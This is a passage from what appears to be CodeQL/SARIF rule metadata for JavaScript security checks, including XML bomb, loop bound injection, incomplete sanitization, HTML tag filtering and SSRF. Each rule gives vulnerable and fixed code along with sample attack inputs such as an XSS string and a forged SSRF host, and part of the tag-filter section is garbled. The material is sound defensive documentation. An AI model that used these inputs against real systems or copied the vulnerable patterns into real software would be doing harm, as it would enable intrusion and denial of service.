decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020", "external/cwe/cwe-184" ], + "description" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n and \"data:\" suggests a logic error or even a security vulnerability.", + "id" : "js/incomplete-url-scheme-check", + "kind" : "problem", + "name" : "Incomplete URL scheme check", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/xml-bomb", + "name" : "js/xml-bomb", + "shortDescription" : { + "text" : "XML internal entity expansion" + }, + "fullDescription" : { + "text" : "Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-776", "external/cwe/cwe-400" ], + "description" : "Parsing user input as an XML document with arbitrary internal\n entity expansion is vulnerable to denial-of-service attacks.", + "id" : "js/xml-bomb", + "kind" : "path-problem", + "name" : "XML internal entity expansion", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/loop-bound-injection", + "name" : "js/loop-bound-injection", + "shortDescription" : { + "text" : "Loop bound injection" + }, + "fullDescription" : { + "text" : "Iterating over an object with a user-controlled .length property can cause indefinite looping." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", + "markdown" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-834", "external/cwe/cwe-730" ], + "description" : "Iterating over an object with a user-controlled .length\n property can cause indefinite looping.", + "id" : "js/loop-bound-injection", + "kind" : "path-problem", + "name" : "Loop bound injection", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/exposure-of-private-files", + "name" : "js/exposure-of-private-files", + "shortDescription" : { + "text" : "Exposure of private files" + }, + "fullDescription" : { + "text" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n", + "markdown" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-200", "external/cwe/cwe-219", "external/cwe/cwe-548" ], + "description" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure\n of private information.", + "id" : "js/exposure-of-private-files", + "kind" : "problem", + "name" : "Exposure of private files", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/incomplete-sanitization", + "name" : "js/incomplete-sanitization", + "shortDescription" : { + "text" : "Incomplete string escaping or encoding" + }, + "fullDescription" : { + "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], + "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", + "id" : "js/incomplete-sanitization", + "kind" : "problem", + "name" : "Incomplete string escaping or encoding", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-multi-character-sanitization", + "name" : "js/incomplete-multi-character-sanitization", + "shortDescription" : { + "text" : "Incomplete multi-character sanitization" + }, + "fullDescription" : { + "text" : "A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", + "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], + "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", + "id" : "js/bad-tag-filter", + "kind" : "problem", + "name" : "Bad HTML filtering regexp", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/tainted-format-string", + "name" : "js/tainted-format-string", + "shortDescription" : { + "text" : "Use of externally-controlled format string" + }, + "fullDescription" : { + "text" : "Using external input in format strings can lead to garbled output." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n", + "markdown" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-134" ], + "description" : "Using external input in format strings can lead to garbled output.", + "id" : "js/tainted-format-string", + "kind" : "path-problem", + "name" : "Use of externally-controlled format string", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.3" + } + }, { + "id" : "js/request-forgery", + "name" : "js/request-forgery", + "shortDescription" : { + "text" : "Server-side request forgery" + }, + "fullDescription" : { + "text" : "Making a network request with user-controlled data in the URL allows for request forgery attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", + "markdown" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = 